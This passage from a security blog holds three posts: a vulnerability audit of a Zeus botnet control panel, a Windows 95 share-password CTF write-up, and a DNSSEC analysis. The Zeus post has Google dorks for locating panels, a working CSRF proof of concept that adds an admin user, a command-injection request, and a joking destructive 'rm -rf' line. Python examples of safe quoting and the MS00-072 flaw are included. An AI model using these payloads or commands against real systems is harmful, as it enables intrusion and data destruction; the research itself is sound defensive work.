<div style="text-align: justify;">
The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
First things first, here are some Google dorks to find Zeus C&C server panel related stuff:</div>
<div style="text-align: justify;">
</div>
<ul>
<li>inurl:cp.php?m=login - this should be the login to the control panel</li>
<li>inurl:_reports/files - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google</li>
<li>inurl:install/index.php - this should be deleted, but I think this is useless now.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1TLdBaEi66Giq_90CrWFmv1uvJ5dx5WY3V3H284CkkfV8AlKxxWY_W8tbT4QV62P4ae2ilx-XcEdlvbCTuVdPJgID8bFB_XdMLZwgxhgWePYEsvr5DMPWG-Sv3pwGq88hYqkpbK1xj1L3/s1600/Zeus1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1TLdBaEi66Giq_90CrWFmv1uvJ5dx5WY3V3H284CkkfV8AlKxxWY_W8tbT4QV62P4ae2ilx-XcEdlvbCTuVdPJgID8bFB_XdMLZwgxhgWePYEsvr5DMPWG-Sv3pwGq88hYqkpbK1xj1L3/s1600/Zeus1.png" width="400" /></a></div>
<br />
<h3>
Boring vulns found</h3>
<ul>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_Credentials_Transported_over_an_Encrypted_Channel_(OWASP-AT-001)">Clear text HTTP login</a> - you can sniff the login password via MiTM, or steal the session cookies</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OWASP-AT-008)">No password policy</a> - admins can set up really weak passwords</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_Weak_lock_out_mechanism_(OWASP-AT-004)">No anti brute-force</a> - you can try to guess the admin's password. Default username is admin</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_Vulnerable_Remember_Password_(OWASP-AT-006)">Password autocomplete enabled</a> - boring</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)">Missing HttpOnly flag on session cookie</a> - it would be nice if I could find an XSS. I need more time to find one!</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)">No CSRF protection</a> - except on the password change, where the old password is needed :-( boring</li>
</ul>
Update: You can use the CSRF to create a new user with admin privileges:<br />
<div>
<div>
<pre class="prettyprint linenums lang-html"><html>
<head>
<title></title>
</head>
<body>
<pre>
This is a CSRF POC to create a new admin user in Zeus admin panels.
Username: user_1392719246 Password: admin1
You might change the URL from 127.0.0.1.
Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.
</pre>
<iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>
<form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">
<input name="name" type="hidden" value="user_1392719246" />
<input name="password" type="hidden" value="admin1" />
<input name="status" type="hidden" value="1" />
<input name="comment" type="hidden" value="PWND!" />
<input name="r_botnet_bots" type="hidden" value="1" />
<input name="r_botnet_scripts" type="hidden" value="1" />
<input name="r_botnet_scripts_edit" type="hidden" value="1" />
<input name="r_edit_bots" type="hidden" value="1" />
<input name="r_reports_db" type="hidden" value="1" />
<input name="r_reports_db_edit" type="hidden" value="1" />
<input name="r_reports_files" type="hidden" value="1" />
<input name="r_reports_files_edit" type="hidden" value="1" />
<input name="r_reports_jn" type="hidden" value="1" />
<input name="r_stats_main" type="hidden" value="1" />
<input name="r_stats_main_reset" type="hidden" value="1" />
<input name="r_stats_os" type="hidden" value="1" />
<input name="r_system_info" type="hidden" value="1" />
<input name="r_system_options" type="hidden" value="1" />
<input name="r_system_user" type="hidden" value="1" />
<input name="r_system_users" type="hidden" value="1" />
</form>
<script type="text/javascript">
window.onload=function(){
var counter = 10;
var interval = setInterval(function() {
counter--;
document.getElementById('countdown').innerHTML = counter;
if (counter == 0) {
redirect();
clearInterval(interval);
}
}, 1000);
};
function redirect() {
document.getElementById("csrf-form").submit();
}
</script>
</body>
</html>
</pre>
<ul>
<li style="text-align: justify;">MD5 passwords - the passwords stored in MySQL are plain MD5 hashes. No <a href="http://www.unlimitednovelty.com/2012/03/dont-use-bcrypt.html">PBKDF2, bcrypt, scrypt, salt</a>, whatever. MD5.</li>
<li style="text-align: justify;"><a href="http://www.contextis.com/research/tools/clickjacking-tool/">ClickJacking</a> - really boring stuff</li>
<li style="text-align: justify;">Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and the MD5 of the username are stored in a cookie. If I had an XSS, I could get the MD5(password) as well.</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)">SQLi</a> - although the queries are built by concatenation instead of parameterized queries and rely on addslashes, the integers are always quoted. This means it is only exploitable with a special multibyte encoding like GB/Big5, which is pretty unlikely.</li>
</ul>
<br />
<h3>
What's good news (for the C&C panel owners)</h3>
<br />
The following stuff looks good, at least some vulns were taken seriously:<br />
<ul>
<li>The system directory is protected with .htaccess deny from all.</li>
<li>gate.php - this is the "gate" between the bots and the server, so this PHP is always exposed to the Internet. The script dies early if you don't know the key. But you can <a href="http://blog.threatexpert.com/2009/09/time-to-revisit-zeus-almighty.html">get the key</a> from the binary of this specific botnet (<a href="http://mnin.blogspot.be/2011/09/abstract-memory-analysis-zeus.html">another URL on how to do this</a>). If you have the key, you can fill the database with garbage, but that's all I can think of right now.</li>
<li>Anti <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)">XSS</a>: the following code is used almost everywhere
<pre class="prettyprint lang-php">return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');</pre>
My evil thought was to inject a malicious bot_id, but it looks like it is filtered everywhere. Sad panda.</li>
</ul>
<br />
<h3>
What's really bad news (for the C&C panel owners)</h3>
<br />
And the best vuln I was able to find: <a href="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OWASP-DV-013)">remote code execution</a> through command injection (happy panda), but only for authenticated users (sad panda).<br />
<br />
The vulnerable code is in system/fsarc.php:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ1Itjy6uJF86CpfyIJ_qQJ9i0FH63W4E0qHnWSkn2i06CGxHEOqLrCD1RG47jC19Aqe2_Ep406zigkl4nODObVKC8SuHCn2CXXyNFsPPDOwfoEzZvqAE2j1RG2N_x0Maw3MA3z_QAObLX/s1600/Zeus2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ1Itjy6uJF86CpfyIJ_qQJ9i0FH63W4E0qHnWSkn2i06CGxHEOqLrCD1RG47jC19Aqe2_Ep406zigkl4nODObVKC8SuHCn2CXXyNFsPPDOwfoEzZvqAE2j1RG2N_x0Maw3MA3z_QAObLX/s1600/Zeus2.png" width="400" /></a></div>
<pre class="prettyprint lang-php">function fsarcCreate($archive, $files){
...
$archive .= '.zip';
// $files comes from the files[] POST parameter; each name is only wrapped in
// double quotes, never escaped, before the whole string is handed to the shell
$cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';
exec($cli, $e, $r);
}</pre>
<br />
The exploit could not be simpler:<br />
<pre class="prettyprint lang-html">POST /cp.php?m=reports_files&path= HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1
</pre>
The || is there because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also chain this vulnerability with the CSRF one, but it is unlikely that you know both the control panel admin and the control panel URL. Or if this is the case, the admin should practice better OPSEC :)<br />
Recommendation: use <a href="http://www.php.net/manual/en/function.escapeshellcmd.php">escapeshellcmd</a> next time.<br />
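<div style="text-align: justify;">Added example (my own Python, not code from the Zeus panel): it mirrors how fsarc.php glues the file names into the zip command line, builds the same command with each argument quoted individually (shlex.quote is the Python counterpart of PHP's escapeshellarg, which quotes one argument, while escapeshellcmd escapes metacharacters in a whole command string), and runs a quote-aware scan over both to show whether the operator from the request above ends up outside the quotes. The archive name is constructed; the file name is the one from the request.</div>

```python
"""Why the fsarc.php zip command is injectable, and what per-argument quoting changes."""
import shlex
from typing import List

# Shell operators that must never appear outside quotes in a built command line.
SHELL_OPERATORS = set("|&;$`\n")

# File name exactly as the request in the post sends it, URL-decoded (sample from the post).
INJECTED_NAME = 'files"||ping -n 10 127.0.0.1'


def build_cli_unsafe(archive: str, files: List[str]) -> str:
    """Mirror of the vulnerable PHP: names are dropped into double quotes unchanged,
    so a double quote inside a name closes the quoting and the rest is parsed as shell."""
    return 'zip -r -9 -q -S "%s.zip" "%s"' % (archive, '" "'.join(files))


def build_cli_safe(archive: str, files: List[str]) -> str:
    """Same command with every argument quoted on its own (shlex.quote, the Python
    counterpart of PHP's escapeshellarg): a quote inside a name stays part of that name."""
    args = ["zip", "-r", "-9", "-q", "-S", archive + ".zip"] + list(files)
    return " ".join(shlex.quote(arg) for arg in args)


def has_unquoted_operator(cli: str) -> bool:
    """Quote-aware scan of a command string: True if a shell operator sits outside
    single or double quotes. A review check, not a full shell parser (no backslash escapes)."""
    quote = None
    for ch in cli:
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch in SHELL_OPERATORS:
            return True
    return False


if __name__ == "__main__":
    for builder in (build_cli_unsafe, build_cli_safe):
        cli = builder("reports", [INJECTED_NAME])  # archive name is constructed
        print(f"{builder.__name__}: {cli}")
        print("  operator reaches the shell:", has_unquoted_operator(cli))
```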
<br />
Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)<br />
<br />
That's all folks!<br />
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )<br />
<br />
<b>Update:</b> Looks like gate.php is worth investigating if you know the RC4 key. <a href="http://cybercrime-tracker.net/zeus.php">You can upload a PHP shell :)</a></div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2tag:blogger.com,1999:blog-7429675726481888518.post-61923512552716416062014-02-02T12:11:00.000+01:002019-10-08T17:56:35.565+02:00Hacking Windows 95, part 1<div style="text-align: justify;">
During a CTF game, we came across very, very old systems. It turns out that it is not that easy to hack those dinosaur-old systems, because modern tools like Metasploit do not have sploits for those old boxes, and of course our "133t h4cking skillz" are useless without Metasploit... :)</div>
<br />
But I had an idea: this could be a nice little research project, just for fun.<br />
<br />
<div style="text-align: justify;">
The rules for the hack are the following:</div>
<ol>
<li style="text-align: justify;">Only publicly available tools can be used for this hack, so no tool development. This is a CTF for script bunniez, and we can't haz code!</li>
<li style="text-align: justify;">Only hacks without user interaction are allowed (IE based sploits are out of scope).</li>
<li style="text-align: justify;">I need instant remote code execution. For example, if I can drop a malware to the c: drive, and change autoexec.bat, I'm still not done, because no one will reboot the CTF machine in a real CTF for me. If I can reboot the machine, that's OK.</li>
<li style="text-align: justify;">I don't have physical access.</li>
</ol>
<div style="text-align: justify;">
I have chosen Windows 95 for this task. First, I had to get a genuine Windows 95 installer, so I visited the Microsoft online shop and downloaded it from their official site.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I installed it in a virtualized environment (remember, you need a boot floppy to install from the CD), and it hit me with a serious nostalgia bomb after watching the installer screens. "Easier to use", "faster and more efficient", "high-powered performance", "friendly", "intuitive interface". Who does not want that? :)</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg67rIoyjbrtBfvwve9eYUNobstAG02_aes_FeZqCWgihpJcvwW0XCo6HnCIvKfB2aIK75atpZEu72FcAafftDLvRt72x9ulHPCGyIRry3KFMFoqrcDLs5Jvol73e1UXVZPlBUxJyYDzOm3/s1600/win95_01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg67rIoyjbrtBfvwve9eYUNobstAG02_aes_FeZqCWgihpJcvwW0XCo6HnCIvKfB2aIK75atpZEu72FcAafftDLvRt72x9ulHPCGyIRry3KFMFoqrcDLs5Jvol73e1UXVZPlBUxJyYDzOm3/s1600/win95_01.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiboDeQZ-NswVumO6-d-apcYEClHjOC0bsEAXfhNopsnu3hgrcTcJ0ukWrMiK8ViSIuO79frAq_jQlD66Ae0yirD0GGAA998Gei2VzNRU_IKkGcrMFhs5DGtK1oz92VvWSgfo1Ae8MFyxAl/s1600/win95_02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiboDeQZ-NswVumO6-d-apcYEClHjOC0bsEAXfhNopsnu3hgrcTcJ0ukWrMiK8ViSIuO79frAq_jQlD66Ae0yirD0GGAA998Gei2VzNRU_IKkGcrMFhs5DGtK1oz92VvWSgfo1Ae8MFyxAl/s1600/win95_02.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG8Dvx8-roEfuS-cSmwAVK1cRERRXPYHGzX3226a1Fp8l23G7tHAdNWW_UAtC8-AEONYrvyhrV2N4aVoGRU-Xm61Jvwb1D9Wb2e9LjEuL4jlVRFMffH79-4aMHZM_ubQJx-KNVfO9wOtlp/s1600/win95_03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG8Dvx8-roEfuS-cSmwAVK1cRERRXPYHGzX3226a1Fp8l23G7tHAdNWW_UAtC8-AEONYrvyhrV2N4aVoGRU-Xm61Jvwb1D9Wb2e9LjEuL4jlVRFMffH79-4aMHZM_ubQJx-KNVfO9wOtlp/s1600/win95_03.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOuLGA5ekSgFA69qQ5hJxN4OLd1nHNaE0YT6jkazvaJkLuWcqfmSCLWx3yAYNFia-IZURRuFVtqqb5jKefcTnMvmQtzTcF4v7b0IBhCLTGJWgkojzVwEXExDRdETZm-_DLB19STn38Z_WA/s1600/win95_04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOuLGA5ekSgFA69qQ5hJxN4OLd1nHNaE0YT6jkazvaJkLuWcqfmSCLWx3yAYNFia-IZURRuFVtqqb5jKefcTnMvmQtzTcF4v7b0IBhCLTGJWgkojzVwEXExDRdETZm-_DLB19STn38Z_WA/s1600/win95_04.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3W0NRVYxSBDhGRXq1hDTAQPPO0-cbBTs8e6HRBERBLXEcwZkPPIwtsUTsoNJYBO4mfpax1ffVGOp5qVCa9WqzF_MQE4qQiUPahYgVfjPaDeGtHZLIY-JqGheyrYGny-BVsci6cO64O18h/s1600/win95_05.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3W0NRVYxSBDhGRXq1hDTAQPPO0-cbBTs8e6HRBERBLXEcwZkPPIwtsUTsoNJYBO4mfpax1ffVGOp5qVCa9WqzF_MQE4qQiUPahYgVfjPaDeGtHZLIY-JqGheyrYGny-BVsci6cO64O18h/s1600/win95_05.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Now that I have a working Windows 95 box, setting up the TCP/IP is easy, let's try to hack it!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
My first tool is always nmap. Let's scan the box! Below I'm showing the interesting parts from the result:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<pre class="prettyprint linenums lang-html">PORT STATE SERVICE VERSION
139/tcp open netbios-ssn
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
Running: Microsoft Windows 3.X|95
OS details: Microsoft Windows for Workgroups 3.11 or Windows 95
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IP ID Sequence Generation: Broken little-endian incremental
</pre>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The first exciting thing to note is that there is no port 445! Port 445 is only since NT 4.0. If you check all the famous windows sploits (e.g., MS03-026, MS08-067), all of them use port 445 and named pipes. But there are no named pipes on Windows 95!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Because I'm a Nessus monkey, let's run a free Nessus scan on it!<br />
<br /></div>
<div style="text-align: justify;">
Only one critical vulnerability found:</div>
<div style="text-align: justify;">
Microsoft Windows NT 4.0 Unsupported Installation Detection</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thanks for nothing, Nessus! But at least it was for free.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Next, I tried GFI LANguard: nothing. It detected the machine as Win95, the open TCP port, and some UDP ports as open (false positives), and that's all...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's try another free vulnerability scanner tool, Nexpose. The results are much better:</div>
<ul>
<li style="text-align: justify;">CIFS NULL Session Permitted</li>
<li style="text-align: justify;">Weak LAN Manager hashing permitted</li>
<li style="text-align: justify;">SMB signing not required</li>
<li style="text-align: justify;">Windows 95/98/ME Share Level Password Bypass</li>
<li style="text-align: justify;">TCP Sequence Number Approximation Vulnerability</li>
<li style="text-align: justify;">ICMP netmask response</li>
<li style="text-align: justify;">CIFS Share Readable By Everyone</li>
</ul>
<div style="text-align: justify;">
I think the following vulnerabilities are useless for me at the moment:</div>
<ul>
<li style="text-align: justify;">Weak LAN Manager hashing permitted - without user interaction or services looking at the network, useless (I might be wrong here, will check this later)</li>
<li style="text-align: justify;">TCP Sequence Number Approximation Vulnerability - not interesting</li>
<li style="text-align: justify;">ICMP netmask response - not interesting</li>
<li style="text-align: justify;">CIFS Share Readable By Everyone - unless there is a password in a text file, useless</li>
</ul>
<div style="text-align: justify;">
But we have two interesting vulns:</div>
<ul>
<li style="text-align: justify;">CIFS NULL Session Permitted - this could be interesting, I will check this later ...</li>
<li style="text-align: justify;">Windows 95/98/ME Share Level Password Bypass - BINGO!</li>
</ul>
<div>
<div style="text-align: justify;">
Let me quote Nexpose here:</div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
"3.2.3 Windows 95/98/ME Share Level Password Bypass (CIFS-win9x-onebyte-password)</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
A flaw in the Windows 95/98/ME File and Print Sharing service allows unauthorized users to access file and print shares by sending the first character of the password. Due to the limited number of attempts required to guess the password, brute force attacks can be performed in just a few seconds.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Established connection to share TEST with password P."</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div style="text-align: justify;">
The vulnerability description at MS side:</div>
<div style="text-align: justify;">
<a href="http://technet.microsoft.com/en-us/security/bulletin/ms00-072">http://technet.microsoft.com/en-us/security/bulletin/ms00-072</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For example, if the password is "Password" (without quotes) and the client sends the password "P" (without quotes) with a length of 1, the client is authenticated. To find the rest of the password, the attacker increments the length to 2 and starts guessing the second letter until he reaches "PA" and gets authenticated again. As share passwords in Windows 95 are not case sensitive, "Pa" and "PA" will also be accepted. The attacker can continue to increment the length and guess the next letter one by one until he gets the full "PASSWORD" (the maximum length is 8 characters).<br />
<br />
I believe all characters between ALT+033 and ALT+255 can be used in a share password in Windows 95, but as it is case insensitive, we have 196 characters to use, and a maximum length of 8 characters. In the worst case this means that the full password can be guessed in 1568 requests. The funny thing is that the share password is (by default) not tied to any username/account, and it cannot be locked out via brute force.</div>
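<div style="text-align: justify;">Added example (my own Python, not from SPC or from this post): a simulation of the MS00-072 comparison flaw described above. The vulnerable check honours the client-supplied length and compares only that many characters, the fixed check compares the whole password in constant time, and the recovery routine extends a known prefix one character at a time exactly as described, counting how many authentication attempts it needs against each. The alphabet (uppercase letters and digits, 36 characters instead of the post's 196) and the sample password are constructed; the mechanism is the one the post explains.</div>

```python
"""Simulation of the Windows 9x share-level password flaw (MS00-072) and its fix."""
import hmac
import string
from typing import Callable, Tuple

# Constructed alphabet: the post counts 196 usable case-folded characters;
# uppercase letters plus digits are enough to show the effect.
CHARSET = string.ascii_uppercase + string.digits
MAX_LEN = 8  # share passwords are at most 8 characters

Checker = Callable[[str, int], bool]  # (guess, client-supplied length) -> authenticated?


def vulnerable_check(stored: str, guess: str, length: int) -> bool:
    """Flawed server-side comparison: the client-supplied length bounds the compare,
    so a one-character guess with length=1 matches any password starting with it.
    Share passwords are case-insensitive, hence the upper()."""
    return stored.upper()[:length] == guess.upper()[:length]


def fixed_check(stored: str, guess: str, length: int) -> bool:
    """Ignore the client's length field and compare the whole password in constant time.
    A partial guess can then only succeed if it is the complete password."""
    expected = stored.upper().encode()
    supplied = guess.upper().encode()
    return len(expected) == len(supplied) and hmac.compare_digest(expected, supplied)


def recover_password(check: Checker) -> Tuple[str, int]:
    """Extend a known prefix one character at a time, as the post describes SPC doing
    on the wire. Returns the recovered password and the number of attempts used."""
    known, attempts = "", 0
    for length in range(1, MAX_LEN + 1):
        for ch in CHARSET:
            attempts += 1
            if check(known + ch, length):
                known += ch
                break
        else:
            break  # no character extends the prefix: the password ends here (or never matched)
    return known, attempts


if __name__ == "__main__":
    secret = "Password"  # constructed sample share password, same as the post's example
    pw, n = recover_password(lambda g, ln: vulnerable_check(secret, g, ln))
    print(f"vulnerable server: recovered {pw!r} in {n} attempts "
          f"(worst case {len(CHARSET) * MAX_LEN})")
    pw, n = recover_password(lambda g, ln: fixed_check(secret, g, ln))
    print(f"fixed server: recovered {pw!r} after {n} attempts "
          f"(exhaustive search would need up to {len(CHARSET) ** MAX_LEN})")
```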
<br />
<div style="text-align: justify;">
Luckily there is a great tool which can exploit this vulnerability:</div>
<div style="text-align: justify;">
<a href="http://www.securityfriday.com/tools/SPC.html">Share Password Checker</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's check this tool in action:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_tBBvO4OUGeaJ7h7FT0hPBQetOM9-bpJtxXFHk-YeVBqFiyzPt0PSiDtw6I7fcgW5tpMs2Lc-zCOhwOkWLNktdaNkzDpfC2KhW1sUn3LYQZbcuo-FjU7v4IwfKyk_k_oC9NTqRr-VkIyw/s1600/spc_hack.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_tBBvO4OUGeaJ7h7FT0hPBQetOM9-bpJtxXFHk-YeVBqFiyzPt0PSiDtw6I7fcgW5tpMs2Lc-zCOhwOkWLNktdaNkzDpfC2KhW1sUn3LYQZbcuo-FjU7v4IwfKyk_k_oC9NTqRr-VkIyw/s1600/spc_hack.png" width="320" /></a></div>
<br />
<div style="text-align: justify;">
W00t w00t, it brute forced the password in less than 2 seconds!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Looking at a Wireshark dump we can see how it is done:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhcnKe5gR6dFALtUgOlvYo3iKLzKIfDhnGj3xho47wkKTFam2mWcj9D2Z2DeFE2gJHJc3-IvhtOEQw-c6GWEipfjSL1knjwmw3Bnd4HlerphWhAab9DCOodX7BN6C_n0hwD1fcvNTGfUlW/s1600/wireshark.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhcnKe5gR6dFALtUgOlvYo3iKLzKIfDhnGj3xho47wkKTFam2mWcj9D2Z2DeFE2gJHJc3-IvhtOEQw-c6GWEipfjSL1knjwmw3Bnd4HlerphWhAab9DCOodX7BN6C_n0hwD1fcvNTGfUlW/s1600/wireshark.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
As you can see in the middle of the dump, it has already guessed the part "PASS" and is brute-forcing the fifth character; it finds that "W" is the correct fifth character, and starts brute-forcing the sixth one.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If we are lucky with the CTF, the whole C:\ drive is shared with full read-write access, and we can write our team identifier into the c:\flag.txt. But what if we want remote code execution? Stay tuned, this is going to be the topic of the <a href="http://jumpespjump.blogspot.hu/2014/05/hacking-windows-95-part-2.html">next part of this post</a>.</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-89750000973737991112014-01-25T13:47:00.000+01:002019-10-08T17:55:35.615+02:00DNSSEC, from an end-user perspective, part 3<div style="text-align: justify;">
In the <a href="http://jumpespjump.blogspot.hu/2013/12/dnssec-from-end-user-perspective-part-1.html" target="_blank">first post</a> of this DNSSEC series, I have shown the problem (DNS vulnerabilities), and in the <a href="http://jumpespjump.blogspot.hu/2014/01/dnssec-from-end-user-perspective-part-2.html" target="_blank">second post</a>, the "solution." In this third post, I am going to analyze DNSSEC. Can DNSSEC protect the users against all of the attacks? Or just part of them? What about corner cases?</div>
<br />
The following list shows the attack types from the <a href="http://jumpespjump.blogspot.hu/2013/12/dnssec-from-end-user-perspective-part-1.html" target="_blank">first post</a> against which DNSSEC <u><b>can</b></u> protect the users:<br />
<br />
<ul>
<li>DNS cache poisoning the DNS server, "Da Old way"</li>
<li>DNS cache poisoning, "<a href="http://www.iana.org/about/presentations/davies-viareggio-entropyvuln-081002.pdf" target="_blank">Da Kaminsky way</a>"</li>
<li>ISP hijack, for advertisement or spying purposes</li>
<li>Captive portals</li>
<li>Pentester hijacks DNS to test application via active man-in-the-middle</li>
<li>Malicious attacker hijacks DNS via active MITM</li>
</ul>
<br />
The following list shows the attack types from the <a href="http://jumpespjump.blogspot.hu/2013/12/dnssec-from-end-user-perspective-part-1.html" target="_blank">first post</a> against which DNSSEC <u style="font-weight: bold;">cannot</u> protect the users:<br />
<br />
<ul>
<li>Rogue DNS server set via malware</li>
<li>Having access to the DNS admin panel and rewriting the IP</li>
<li>ISP hijack, for advertisement or spying purposes</li>
<li>Captive portals</li>
<li>Pentester hijacks DNS to test application via active man-in-the-middle</li>
<li>Malicious attacker hijacks DNS via active MITM</li>
</ul>
<br />
<div style="text-align: justify;">
If you are a reader who thinks while reading, you might say "What the hell? Am I protected or not???". The problem is that it depends… In the case where the attacker sits between you and your DNS server, the attacker can impersonate the DNS server, downgrade it to a non-DNSSEC-aware one, and send responses without any DNSSEC information.</div>
<div>
<br /></div>
<div>
Now, how can I protect against all of these attacks? The answer is "simple":</div>
<div>
<ol>
<li>Configure your own DNSSEC aware server on your localhost, and use that as a resolver. This is pretty easy, even I was able to do it <a href="http://www.howtoforge.com/configuring-dnssec-on-bind9-9.7.3-on-debian-squeeze-ubuntu-11.10" target="_blank">using tutorials</a>.</li>
<li>Don't let malware run on your system! ;-)</li>
<li>Use at least two-factor authentication for admin access of your DNS admin panel.</li>
<li>Use a registry lock (details in <a href="http://jumpespjump.blogspot.hu/2013/12/dnssec-from-end-user-perspective-part-1.html" target="_blank">part 1</a>).</li>
<li>Use a DNSSEC aware OS.</li>
<li>Use DNSSEC protected websites.</li>
<li>There is a need for an API or something similar, through which the client can enforce DNSSEC-protected answers. If the answer is not protected with DNSSEC, the connection cannot be established.</li>
</ol>
<div>
<div>
<br /></div>
<div>
Now some random facts, thoughts, solutions around DNSSEC:</div>
<div>
<ul>
<li>Did you know .SE signed its zone with DNSSEC in September 2005, as the first TLD in the world?</li>
<li>Did you know DNSSEC was first deployed at the root level on July 15, 2010?</li>
<li>Did you know <a href="https://xs.powerdns.com/dnssec-nl-graph/" target="_blank">.NL became the first TLD to pass 1 million DNSSEC-signed domain names</a>?</li>
<li>Did you know that <a href="http://deneb.iszt.hu/dnssec-hu/" target="_blank">Hungary is in the testing phase of DNSSEC</a> (watch out, it is Hungarian)?</li>
<li>Did you know that <a href="https://addons.mozilla.org/en-us/firefox/addon/dnssec-validator/" target="_blank">you can also use and test that cool DNSSEC validator</a>?</li>
<li>Did you know that <a href="http://www.opendns.com/about/innovations/dnscrypt/" target="_blank">there are alternative solutions like DNSCrypt</a>?</li>
<li>Did you know that in the future you might be able to enforce <a href="http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security" target="_blank">HSTS</a> via DNSSEC?</li>
<li>Did you know that in the future you might be able to use <a href="http://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities" target="_blank">certificate pinning via DNSSEC</a>?</li>
</ul>
</div>
